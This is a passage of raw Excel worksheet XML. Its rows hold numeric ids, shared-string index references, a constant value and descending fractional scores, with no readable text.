      <c r="F27612" s="2">
        <v>0.09454191033138398</v>
      </c>
    </row>
    <row r="27613" ht="15.75" customHeight="1">
      <c r="A27613" s="1">
        <v>2674.0</v>
      </c>
      <c r="B27613" s="2">
        <v>3.4765464E7</v>
      </c>
      <c r="C27613" s="2" t="s">
        <v>26540</v>
      </c>
      <c r="D27613" s="2">
        <v>1.0</v>
      </c>
      <c r="E27613" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27613" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="27614" ht="15.75" customHeight="1">
      <c r="A27614" s="1">
        <v>20636.0</v>
      </c>
      <c r="B27614" s="2">
        <v>1.4171068E7</v>
      </c>
      <c r="C27614" s="2" t="s">
        <v>22168</v>
      </c>
      <c r="D27614" s="2">
        <v>1.0</v>
      </c>
      <c r="E27614" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27614" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="27615" ht="15.75" customHeight="1">
      <c r="A27615" s="1">
        <v>24341.0</v>
      </c>
      <c r="B27615" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C27615" s="2" t="s">
        <v>26541</v>
      </c>
      <c r="D27615" s="2">
        <v>1.0</v>
      </c>
      <c r="E27615" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27615" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="27616" ht="15.75" customHeight="1">
      <c r="A27616" s="1">
        <v>26831.0</v>
      </c>
      <c r="B27616" s="2">
        <v>1.887027E7</v>
      </c>
      <c r="C27616" s="2" t="s">
        <v>26542</v>
      </c>
      <c r="D27616" s="2">
        <v>1.0</v>
      </c>
      <c r="E27616" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27616" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="27617" ht="15.75" customHeight="1">
      <c r="A27617" s="1">
        <v>11673.0</v>
      </c>
      <c r="B27617" s="2">
        <v>2.3391677E7</v>
      </c>
      <c r="C27617" s="2" t="s">
        <v>26543</v>
      </c>
      <c r="D27617" s="2">
        <v>1.0</v>
      </c>
      <c r="E27617" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27617" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="27618" ht="15.75" customHeight="1">
      <c r="A27618" s="1">
        <v>12384.0</v>
      </c>
      <c r="B27618" s="2">
        <v>2.8841007E7</v>
      </c>
      <c r="C27618" s="2" t="s">
        <v>26544</v>
      </c>
      <c r="D27618" s="2">
        <v>1.0</v>
      </c>
      <c r="E27618" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27618" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="27619" ht="15.75" customHeight="1">
      <c r="A27619" s="1">
        <v>15606.0</v>
      </c>
      <c r="B27619" s="2">
        <v>4.3513904E7</v>
      </c>
      <c r="C27619" s="2" t="s">
        <v>26545</v>
      </c>
      <c r="D27619" s="2">
        <v>1.0</v>
      </c>
      <c r="E27619" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27619" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="27620" ht="15.75" customHeight="1">
      <c r="A27620" s="1">
        <v>785.0</v>
      </c>
      <c r="B27620" s="2">
        <v>2.1205607E7</v>
      </c>
      <c r="C27620" s="2" t="s">
        <v>26546</v>
      </c>
      <c r="D27620" s="2">
        <v>1.0</v>
      </c>
      <c r="E27620" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27620" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="27621" ht="15.75" customHeight="1">
      <c r="A27621" s="1">
        <v>33973.0</v>
      </c>
      <c r="B27621" s="2">
        <v>9386004.0</v>
      </c>
      <c r="C27621" s="2" t="s">
        <v>26547</v>
      </c>
      <c r="D27621" s="2">
        <v>1.0</v>
      </c>
      <c r="E27621" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27621" s="2">
        <v>0.092911877394636</v>
      </c>
    </row>
    <row r="27622" ht="15.75" customHeight="1">
      <c r="A27622" s="1">
        <v>6233.0</v>
      </c>
      <c r="B27622" s="2">
        <v>4.8071194E7</v>
      </c>
      <c r="C27622" s="2" t="s">
        <v>26548</v>
      </c>
      <c r="D27622" s="2">
        <v>1.0</v>
      </c>
      <c r="E27622" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27622" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27623" ht="15.75" customHeight="1">
      <c r="A27623" s="1">
        <v>10820.0</v>
      </c>
      <c r="B27623" s="2">
        <v>1.5864724E7</v>
      </c>
      <c r="C27623" s="2" t="s">
        <v>26549</v>
      </c>
      <c r="D27623" s="2">
        <v>1.0</v>
      </c>
      <c r="E27623" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27623" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27624" ht="15.75" customHeight="1">
      <c r="A27624" s="1">
        <v>16020.0</v>
      </c>
      <c r="B27624" s="2">
        <v>4.503958E7</v>
      </c>
      <c r="C27624" s="2" t="s">
        <v>26550</v>
      </c>
      <c r="D27624" s="2">
        <v>1.0</v>
      </c>
      <c r="E27624" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27624" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27625" ht="15.75" customHeight="1">
      <c r="A27625" s="1">
        <v>23772.0</v>
      </c>
      <c r="B27625" s="2">
        <v>7562024.0</v>
      </c>
      <c r="C27625" s="2" t="s">
        <v>26551</v>
      </c>
      <c r="D27625" s="2">
        <v>1.0</v>
      </c>
      <c r="E27625" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27625" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27626" ht="15.75" customHeight="1">
      <c r="A27626" s="1">
        <v>32582.0</v>
      </c>
      <c r="B27626" s="2">
        <v>5783602.0</v>
      </c>
      <c r="C27626" s="2" t="s">
        <v>26552</v>
      </c>
      <c r="D27626" s="2">
        <v>1.0</v>
      </c>
      <c r="E27626" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27626" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27627" ht="15.75" customHeight="1">
      <c r="A27627" s="1">
        <v>33328.0</v>
      </c>
      <c r="B27627" s="2">
        <v>7562023.0</v>
      </c>
      <c r="C27627" s="2" t="s">
        <v>26551</v>
      </c>
      <c r="D27627" s="2">
        <v>1.0</v>
      </c>
      <c r="E27627" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27627" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="27628" ht="15.75" customHeight="1">
      <c r="A27628" s="1">
        <v>14321.0</v>
      </c>
      <c r="B27628" s="2">
        <v>3.870626E7</v>
      </c>
      <c r="C27628" s="2" t="s">
        <v>26553</v>
      </c>
      <c r="D27628" s="2">
        <v>1.0</v>
      </c>
      <c r="E27628" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27628" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="27629" ht="15.75" customHeight="1">
      <c r="A27629" s="1">
        <v>16046.0</v>
      </c>
      <c r="B27629" s="2">
        <v>4.5204344E7</v>
      </c>
      <c r="C27629" s="2" t="s">
        <v>26554</v>
      </c>
      <c r="D27629" s="2">
        <v>1.0</v>
      </c>
      <c r="E27629" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27629" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="27630" ht="15.75" customHeight="1">
      <c r="A27630" s="1">
        <v>21592.0</v>
      </c>
      <c r="B27630" s="2">
        <v>2.3995614E7</v>
      </c>
      <c r="C27630" s="2" t="s">
        <v>26555</v>
      </c>
      <c r="D27630" s="2">
        <v>1.0</v>
      </c>
      <c r="E27630" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27630" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="27631" ht="15.75" customHeight="1">
      <c r="A27631" s="1">
        <v>28274.0</v>
      </c>
      <c r="B27631" s="2">
        <v>2.5400161E7</v>
      </c>
      <c r="C27631" s="2" t="s">
        <v>26556</v>
      </c>
      <c r="D27631" s="2">
        <v>1.0</v>
      </c>
      <c r="E27631" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27631" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="27632" ht="15.75" customHeight="1">
      <c r="A27632" s="1">
        <v>6693.0</v>
      </c>
      <c r="B27632" s="2">
        <v>4.9191131E7</v>
      </c>
      <c r="C27632" s="2" t="s">
        <v>26557</v>
      </c>
      <c r="D27632" s="2">
        <v>1.0</v>
      </c>
      <c r="E27632" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27632" s="2">
        <v>0.09041394335511982</v>
      </c>
    </row>
    <row r="27633" ht="15.75" customHeight="1">
      <c r="A27633" s="1">
        <v>8707.0</v>
      </c>
      <c r="B27633" s="2">
        <v>5.4450251E7</v>
      </c>
      <c r="C27633" s="2" t="s">
        <v>26558</v>
      </c>
      <c r="D27633" s="2">
        <v>1.0</v>
      </c>
      <c r="E27633" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27633" s="2">
        <v>0.9297351148616972</v>
      </c>
    </row>
    <row r="27634" ht="15.75" customHeight="1">
      <c r="A27634" s="1">
        <v>943.0</v>
      </c>
      <c r="B27634" s="2">
        <v>2.2482581E7</v>
      </c>
      <c r="C27634" s="2" t="s">
        <v>26560</v>
      </c>
      <c r="D27634" s="2">
        <v>1.0</v>
      </c>
      <c r="E27634" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27634" s="2">
        <v>0.6651234567901234</v>
      </c>
    </row>
    <row r="27635" ht="15.75" customHeight="1">
      <c r="A27635" s="1">
        <v>30338.0</v>
      </c>
      <c r="B27635" s="2">
        <v>3.8146906E7</v>
      </c>
      <c r="C27635" s="2" t="s">
        <v>26561</v>
      </c>
      <c r="D27635" s="2">
        <v>1.0</v>
      </c>
      <c r="E27635" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27635" s="2">
        <v>0.4215086646279307</v>
      </c>
    </row>
    <row r="27636" ht="15.75" customHeight="1">
      <c r="A27636" s="1">
        <v>30337.0</v>
      </c>
      <c r="B27636" s="2">
        <v>3.8146906E7</v>
      </c>
      <c r="C27636" s="2" t="s">
        <v>26562</v>
      </c>
      <c r="D27636" s="2">
        <v>1.0</v>
      </c>
      <c r="E27636" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27636" s="2">
        <v>0.379725085910653</v>
      </c>
    </row>
    <row r="27637" ht="15.75" customHeight="1">
      <c r="A27637" s="1">
        <v>17171.0</v>
      </c>
      <c r="B27637" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C27637" s="2" t="s">
        <v>26563</v>
      </c>
      <c r="D27637" s="2">
        <v>1.0</v>
      </c>
      <c r="E27637" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27637" s="2">
        <v>0.3352758352758353</v>
      </c>
    </row>
    <row r="27638" ht="15.75" customHeight="1">
      <c r="A27638" s="1">
        <v>24212.0</v>
      </c>
      <c r="B27638" s="2">
        <v>1.0392241E7</v>
      </c>
      <c r="C27638" s="2" t="s">
        <v>26564</v>
      </c>
      <c r="D27638" s="2">
        <v>1.0</v>
      </c>
      <c r="E27638" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27638" s="2">
        <v>0.3327832783278328</v>
      </c>
    </row>
    <row r="27639" ht="15.75" customHeight="1">
      <c r="A27639" s="1">
        <v>11694.0</v>
      </c>
      <c r="B27639" s="2">
        <v>2.3458481E7</v>
      </c>
      <c r="C27639" s="2" t="s">
        <v>26565</v>
      </c>
      <c r="D27639" s="2">
        <v>1.0</v>
      </c>
      <c r="E27639" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27639" s="2">
        <v>0.3247515808491418</v>
      </c>
    </row>
    <row r="27640" ht="15.75" customHeight="1">
      <c r="A27640" s="1">
        <v>4840.0</v>
      </c>
      <c r="B27640" s="2">
        <v>4.3681363E7</v>
      </c>
      <c r="C27640" s="2" t="s">
        <v>26566</v>
      </c>
      <c r="D27640" s="2">
        <v>1.0</v>
      </c>
      <c r="E27640" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27640" s="2">
        <v>0.2995495495495495</v>
      </c>
    </row>
    <row r="27641" ht="15.75" customHeight="1">
      <c r="A27641" s="1">
        <v>17575.0</v>
      </c>
      <c r="B27641" s="2">
        <v>5.0264914E7</v>
      </c>
      <c r="C27641" s="2" t="s">
        <v>26567</v>
      </c>
      <c r="D27641" s="2">
        <v>1.0</v>
      </c>
      <c r="E27641" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27641" s="2">
        <v>0.2739197530864198</v>
      </c>
    </row>
    <row r="27642" ht="15.75" customHeight="1">
      <c r="A27642" s="1">
        <v>7525.0</v>
      </c>
      <c r="B27642" s="2">
        <v>5.1439584E7</v>
      </c>
      <c r="C27642" s="2" t="s">
        <v>26568</v>
      </c>
      <c r="D27642" s="2">
        <v>1.0</v>
      </c>
      <c r="E27642" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27642" s="2">
        <v>0.2478070175438597</v>
      </c>
    </row>
    <row r="27643" ht="15.75" customHeight="1">
      <c r="A27643" s="1">
        <v>4490.0</v>
      </c>
      <c r="B27643" s="2">
        <v>4.2518731E7</v>
      </c>
      <c r="C27643" s="2" t="s">
        <v>26569</v>
      </c>
      <c r="D27643" s="2">
        <v>1.0</v>
      </c>
      <c r="E27643" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27643" s="2">
        <v>0.2317251461988304</v>
      </c>
    </row>
    <row r="27644" ht="15.75" customHeight="1">
      <c r="A27644" s="1">
        <v>21542.0</v>
      </c>
      <c r="B27644" s="2">
        <v>2.3527513E7</v>
      </c>
      <c r="C27644" s="2" t="s">
        <v>26570</v>
      </c>
      <c r="D27644" s="2">
        <v>1.0</v>
      </c>
      <c r="E27644" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27644" s="2">
        <v>0.2316239316239316</v>
      </c>
    </row>
    <row r="27645" ht="15.75" customHeight="1">
      <c r="A27645" s="1">
        <v>2127.0</v>
      </c>
      <c r="B27645" s="2">
        <v>3.1430786E7</v>
      </c>
      <c r="C27645" s="2" t="s">
        <v>26571</v>
      </c>
      <c r="D27645" s="2">
        <v>1.0</v>
      </c>
      <c r="E27645" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27645" s="2">
        <v>0.2267441860465117</v>
      </c>
    </row>
    <row r="27646" ht="15.75" customHeight="1">
      <c r="A27646" s="1">
        <v>27869.0</v>
      </c>
      <c r="B27646" s="2">
        <v>2.3527512E7</v>
      </c>
      <c r="C27646" s="2" t="s">
        <v>26572</v>
      </c>
      <c r="D27646" s="2">
        <v>1.0</v>
      </c>
      <c r="E27646" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27646" s="2">
        <v>0.2263681592039801</v>
      </c>
    </row>
    <row r="27647" ht="15.75" customHeight="1">
      <c r="A27647" s="1">
        <v>32259.0</v>
      </c>
      <c r="B27647" s="2">
        <v>5510854.0</v>
      </c>
      <c r="C27647" s="2" t="s">
        <v>26573</v>
      </c>
      <c r="D27647" s="2">
        <v>1.0</v>
      </c>
      <c r="E27647" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27647" s="2">
        <v>0.2160493827160493</v>
      </c>
    </row>
    <row r="27648" ht="15.75" customHeight="1">
      <c r="A27648" s="1">
        <v>5019.0</v>
      </c>
      <c r="B27648" s="2">
        <v>4.4216872E7</v>
      </c>
      <c r="C27648" s="2" t="s">
        <v>26574</v>
      </c>
      <c r="D27648" s="2">
        <v>1.0</v>
      </c>
      <c r="E27648" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27648" s="2">
        <v>0.2149999999999999</v>
      </c>
    </row>
    <row r="27649" ht="15.75" customHeight="1">
      <c r="A27649" s="1">
        <v>29738.0</v>
      </c>
      <c r="B27649" s="2">
        <v>3.4591556E7</v>
      </c>
      <c r="C27649" s="2" t="s">
        <v>26575</v>
      </c>
      <c r="D27649" s="2">
        <v>1.0</v>
      </c>
      <c r="E27649" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27649" s="2">
        <v>0.2146464646464647</v>
      </c>
    </row>
    <row r="27650" ht="15.75" customHeight="1">
      <c r="A27650" s="1">
        <v>25919.0</v>
      </c>
      <c r="B27650" s="2">
        <v>1.5156106E7</v>
      </c>
      <c r="C27650" s="2" t="s">
        <v>26576</v>
      </c>
      <c r="D27650" s="2">
        <v>1.0</v>
      </c>
      <c r="E27650" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27650" s="2">
        <v>0.2122040072859745</v>
      </c>
    </row>
    <row r="27651" ht="15.75" customHeight="1">
      <c r="A27651" s="1">
        <v>24568.0</v>
      </c>
      <c r="B27651" s="2">
        <v>1.1316653E7</v>
      </c>
      <c r="C27651" s="2" t="s">
        <v>26577</v>
      </c>
      <c r="D27651" s="2">
        <v>1.0</v>
      </c>
      <c r="E27651" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27651" s="2">
        <v>0.2103825136612022</v>
      </c>
    </row>
    <row r="27652" ht="15.75" customHeight="1">
      <c r="A27652" s="1">
        <v>34070.0</v>
      </c>
      <c r="B27652" s="2">
        <v>9650451.0</v>
      </c>
      <c r="C27652" s="2" t="s">
        <v>26578</v>
      </c>
      <c r="D27652" s="2">
        <v>1.0</v>
      </c>
      <c r="E27652" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27652" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="27653" ht="15.75" customHeight="1">
      <c r="A27653" s="1">
        <v>526.0</v>
      </c>
      <c r="B27653" s="2">
        <v>1.84057E7</v>
      </c>
      <c r="C27653" s="2" t="s">
        <v>26579</v>
      </c>
      <c r="D27653" s="2">
        <v>1.0</v>
      </c>
      <c r="E27653" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27653" s="2">
        <v>0.2053140096618358</v>
      </c>
    </row>
    <row r="27654" ht="15.75" customHeight="1">
      <c r="A27654" s="1">
        <v>33291.0</v>
      </c>
      <c r="B27654" s="2">
        <v>7481580.0</v>
      </c>
      <c r="C27654" s="2" t="s">
        <v>26580</v>
      </c>
      <c r="D27654" s="2">
        <v>1.0</v>
      </c>
      <c r="E27654" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27654" s="2">
        <v>0.2042253521126761</v>
      </c>
    </row>
    <row r="27655" ht="15.75" customHeight="1">
      <c r="A27655" s="1">
        <v>8564.0</v>
      </c>
      <c r="B27655" s="2">
        <v>5.4175021E7</v>
      </c>
      <c r="C27655" s="2" t="s">
        <v>26581</v>
      </c>
      <c r="D27655" s="2">
        <v>1.0</v>
      </c>
      <c r="E27655" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27655" s="2">
        <v>0.2032967032967033</v>
      </c>
    </row>
    <row r="27656" ht="15.75" customHeight="1">
      <c r="A27656" s="1">
        <v>5312.0</v>
      </c>
      <c r="B27656" s="2">
        <v>4.527377E7</v>
      </c>
      <c r="C27656" s="2" t="s">
        <v>26582</v>
      </c>
      <c r="D27656" s="2">
        <v>1.0</v>
      </c>
      <c r="E27656" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27656" s="2">
        <v>0.200960219478738</v>
      </c>
    </row>
    <row r="27657" ht="15.75" customHeight="1">
      <c r="A27657" s="1">
        <v>27870.0</v>
      </c>
      <c r="B27657" s="2">
        <v>2.3527512E7</v>
      </c>
      <c r="C27657" s="2" t="s">
        <v>26583</v>
      </c>
      <c r="D27657" s="2">
        <v>1.0</v>
      </c>
      <c r="E27657" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27657" s="2">
        <v>0.1995305164319249</v>
      </c>
    </row>
    <row r="27658" ht="15.75" customHeight="1">
      <c r="A27658" s="1">
        <v>31534.0</v>
      </c>
      <c r="B27658" s="2">
        <v>5094496.0</v>
      </c>
      <c r="C27658" s="2" t="s">
        <v>26584</v>
      </c>
      <c r="D27658" s="2">
        <v>1.0</v>
      </c>
      <c r="E27658" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27658" s="2">
        <v>0.1972222222222223</v>
      </c>
    </row>
    <row r="27659" ht="15.75" customHeight="1">
      <c r="A27659" s="1">
        <v>11390.0</v>
      </c>
      <c r="B27659" s="2">
        <v>2.1535656E7</v>
      </c>
      <c r="C27659" s="2" t="s">
        <v>26585</v>
      </c>
      <c r="D27659" s="2">
        <v>1.0</v>
      </c>
      <c r="E27659" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27659" s="2">
        <v>0.1958105646630237</v>
      </c>
    </row>
    <row r="27660" ht="15.75" customHeight="1">
      <c r="A27660" s="1">
        <v>33284.0</v>
      </c>
      <c r="B27660" s="2">
        <v>7450287.0</v>
      </c>
      <c r="C27660" s="2" t="s">
        <v>26586</v>
      </c>
      <c r="D27660" s="2">
        <v>1.0</v>
      </c>
      <c r="E27660" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27660" s="2">
        <v>0.1948590381426202</v>
      </c>
    </row>
    <row r="27661" ht="15.75" customHeight="1">
      <c r="A27661" s="1">
        <v>10589.0</v>
      </c>
      <c r="B27661" s="2">
        <v>1.3361698E7</v>
      </c>
      <c r="C27661" s="2" t="s">
        <v>26587</v>
      </c>
      <c r="D27661" s="2">
        <v>1.0</v>
      </c>
      <c r="E27661" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27661" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="27662" ht="15.75" customHeight="1">
      <c r="A27662" s="1">
        <v>16498.0</v>
      </c>
      <c r="B27662" s="2">
        <v>4.6572487E7</v>
      </c>
      <c r="C27662" s="2" t="s">
        <v>26588</v>
      </c>
      <c r="D27662" s="2">
        <v>1.0</v>
      </c>
      <c r="E27662" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27662" s="2">
        <v>0.1933895921237694</v>
      </c>
    </row>
    <row r="27663" ht="15.75" customHeight="1">
      <c r="A27663" s="1">
        <v>33069.0</v>
      </c>
      <c r="B27663" s="2">
        <v>6866993.0</v>
      </c>
      <c r="C27663" s="2" t="s">
        <v>26589</v>
      </c>
      <c r="D27663" s="2">
        <v>1.0</v>
      </c>
      <c r="E27663" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27663" s="2">
        <v>0.1918518518518519</v>
      </c>
    </row>
    <row r="27664" ht="15.75" customHeight="1">
      <c r="A27664" s="1">
        <v>16516.0</v>
      </c>
      <c r="B27664" s="2">
        <v>4.6624944E7</v>
      </c>
      <c r="C27664" s="2" t="s">
        <v>26590</v>
      </c>
      <c r="D27664" s="2">
        <v>1.0</v>
      </c>
      <c r="E27664" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27664" s="2">
        <v>0.1908212560386474</v>
      </c>
    </row>
    <row r="27665" ht="15.75" customHeight="1">
      <c r="A27665" s="1">
        <v>24949.0</v>
      </c>
      <c r="B27665" s="2">
        <v>1.2544579E7</v>
      </c>
      <c r="C27665" s="2" t="s">
        <v>26591</v>
      </c>
      <c r="D27665" s="2">
        <v>1.0</v>
      </c>
      <c r="E27665" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27665" s="2">
        <v>0.1897163120567376</v>
      </c>
    </row>
    <row r="27666" ht="15.75" customHeight="1">
      <c r="A27666" s="1">
        <v>12912.0</v>
      </c>
      <c r="B27666" s="2">
        <v>3.2185774E7</v>
      </c>
      <c r="C27666" s="2" t="s">
        <v>26592</v>
      </c>
      <c r="D27666" s="2">
        <v>1.0</v>
      </c>
      <c r="E27666" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27666" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="27667" ht="15.75" customHeight="1">
      <c r="A27667" s="1">
        <v>18475.0</v>
      </c>
      <c r="B27667" s="2">
        <v>5.2854217E7</v>
      </c>
      <c r="C27667" s="2" t="s">
        <v>26593</v>
      </c>
      <c r="D27667" s="2">
        <v>1.0</v>
      </c>
      <c r="E27667" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27667" s="2">
        <v>0.187984496124031</v>
      </c>
    </row>
    <row r="27668" ht="15.75" customHeight="1">
      <c r="A27668" s="1">
        <v>33414.0</v>
      </c>
      <c r="B27668" s="2">
        <v>7737511.0</v>
      </c>
      <c r="C27668" s="2" t="s">
        <v>26594</v>
      </c>
      <c r="D27668" s="2">
        <v>1.0</v>
      </c>
      <c r="E27668" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27668" s="2">
        <v>0.1875</v>
      </c>
    </row>
    <row r="27669" ht="15.75" customHeight="1">
      <c r="A27669" s="1">
        <v>27700.0</v>
      </c>
      <c r="B27669" s="2">
        <v>2.3016913E7</v>
      </c>
      <c r="C27669" s="2" t="s">
        <v>26595</v>
      </c>
      <c r="D27669" s="2">
        <v>1.0</v>
      </c>
      <c r="E27669" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27669" s="2">
        <v>0.1867030965391621</v>
      </c>
    </row>
    <row r="27670" ht="15.75" customHeight="1">
      <c r="A27670" s="1">
        <v>28531.0</v>
      </c>
      <c r="B27670" s="2">
        <v>2.6794362E7</v>
      </c>
      <c r="C27670" s="2" t="s">
        <v>26596</v>
      </c>
      <c r="D27670" s="2">
        <v>1.0</v>
      </c>
      <c r="E27670" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27670" s="2">
        <v>0.1854990583804143</v>
      </c>
    </row>
    <row r="27671" ht="15.75" customHeight="1">
      <c r="A27671" s="1">
        <v>21810.0</v>
      </c>
      <c r="B27671" s="2">
        <v>2.6794363E7</v>
      </c>
      <c r="C27671" s="2" t="s">
        <v>26596</v>
      </c>
      <c r="D27671" s="2">
        <v>1.0</v>
      </c>
      <c r="E27671" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27671" s="2">
        <v>0.1836158192090395</v>
      </c>
    </row>
    <row r="27672" ht="15.75" customHeight="1">
      <c r="A27672" s="1">
        <v>26104.0</v>
      </c>
      <c r="B27672" s="2">
        <v>1.5743373E7</v>
      </c>
      <c r="C27672" s="2" t="s">
        <v>26597</v>
      </c>
      <c r="D27672" s="2">
        <v>1.0</v>
      </c>
      <c r="E27672" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27672" s="2">
        <v>0.1836158192090395</v>
      </c>
    </row>
    <row r="27673" ht="15.75" customHeight="1">
      <c r="A27673" s="1">
        <v>30366.0</v>
      </c>
      <c r="B27673" s="2">
        <v>3.8367645E7</v>
      </c>
      <c r="C27673" s="2" t="s">
        <v>26598</v>
      </c>
      <c r="D27673" s="2">
        <v>1.0</v>
      </c>
      <c r="E27673" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27673" s="2">
        <v>0.1832504145936982</v>
      </c>
    </row>
    <row r="27674" ht="15.75" customHeight="1">
      <c r="A27674" s="1">
        <v>10107.0</v>
      </c>
      <c r="B27674" s="2">
        <v>5.7243106E7</v>
      </c>
      <c r="C27674" s="2" t="s">
        <v>26599</v>
      </c>
      <c r="D27674" s="2">
        <v>1.0</v>
      </c>
      <c r="E27674" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27674" s="2">
        <v>0.1828703703703704</v>
      </c>
    </row>
    <row r="27675" ht="15.75" customHeight="1">
      <c r="A27675" s="1">
        <v>18789.0</v>
      </c>
      <c r="B27675" s="2">
        <v>5.3827503E7</v>
      </c>
      <c r="C27675" s="2" t="s">
        <v>26600</v>
      </c>
      <c r="D27675" s="2">
        <v>1.0</v>
      </c>
      <c r="E27675" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27675" s="2">
        <v>0.1820512820512821</v>
      </c>
    </row>
    <row r="27676" ht="15.75" customHeight="1">
      <c r="A27676" s="1">
        <v>19343.0</v>
      </c>
      <c r="B27676" s="2">
        <v>5.5361021E7</v>
      </c>
      <c r="C27676" s="2" t="s">
        <v>26601</v>
      </c>
      <c r="D27676" s="2">
        <v>1.0</v>
      </c>
      <c r="E27676" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27676" s="2">
        <v>0.1820512820512821</v>
      </c>
    </row>
    <row r="27677" ht="15.75" customHeight="1">
      <c r="A27677" s="1">
        <v>20854.0</v>
      </c>
      <c r="B27677" s="2">
        <v>1.5743374E7</v>
      </c>
      <c r="C27677" s="2" t="s">
        <v>26597</v>
      </c>
      <c r="D27677" s="2">
        <v>1.0</v>
      </c>
      <c r="E27677" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27677" s="2">
        <v>0.1817325800376648</v>
      </c>
    </row>
    <row r="27678" ht="15.75" customHeight="1">
      <c r="A27678" s="1">
        <v>21014.0</v>
      </c>
      <c r="B27678" s="2">
        <v>1.7313818E7</v>
      </c>
      <c r="C27678" s="2" t="s">
        <v>26602</v>
      </c>
      <c r="D27678" s="2">
        <v>1.0</v>
      </c>
      <c r="E27678" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27678" s="2">
        <v>0.180976430976431</v>
      </c>
    </row>
    <row r="27679" ht="15.75" customHeight="1">
      <c r="A27679" s="1">
        <v>9939.0</v>
      </c>
      <c r="B27679" s="2">
        <v>5.6851297E7</v>
      </c>
      <c r="C27679" s="2" t="s">
        <v>26603</v>
      </c>
      <c r="D27679" s="2">
        <v>1.0</v>
      </c>
      <c r="E27679" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27679" s="2">
        <v>0.1807511737089202</v>
